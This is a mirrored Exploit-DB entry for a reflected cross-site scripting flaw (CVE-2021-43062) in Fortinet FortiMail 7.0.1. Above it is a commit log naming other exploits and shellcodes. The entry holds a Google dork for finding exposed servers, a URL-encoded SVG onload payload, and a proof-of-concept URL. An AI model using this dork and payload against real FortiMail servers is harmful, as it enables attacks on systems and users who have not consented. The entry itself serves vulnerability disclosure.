bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/50759.txt
Offensive Security f2d7e05ad0 DB: 2022-02-19 
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
2022-02-19 05:01:36 +00:00

24 lines
No EOL
1.1 KiB
Text
Raw Blame History

# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/fmlurlsvc/
# Date: 01-Feb-2022
# Exploit Author: Braiant Giraldo Villa
# Contact: @iron_fortress (Twitter)
# Vendor Homepage: https://www.fortinet.com/products/email-security
# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
# Version:
# FortiMail version 7.0.1 and below
# FortiMail version 6.4.5 and below
# FortiMail version 6.2.7 and below
# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
1. Description:
An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. Proof of Concept:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
4. References
https://www.fortiguard.com/psirt/FG-IR-21-185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
Reference in a new issue View git blame Copy permalink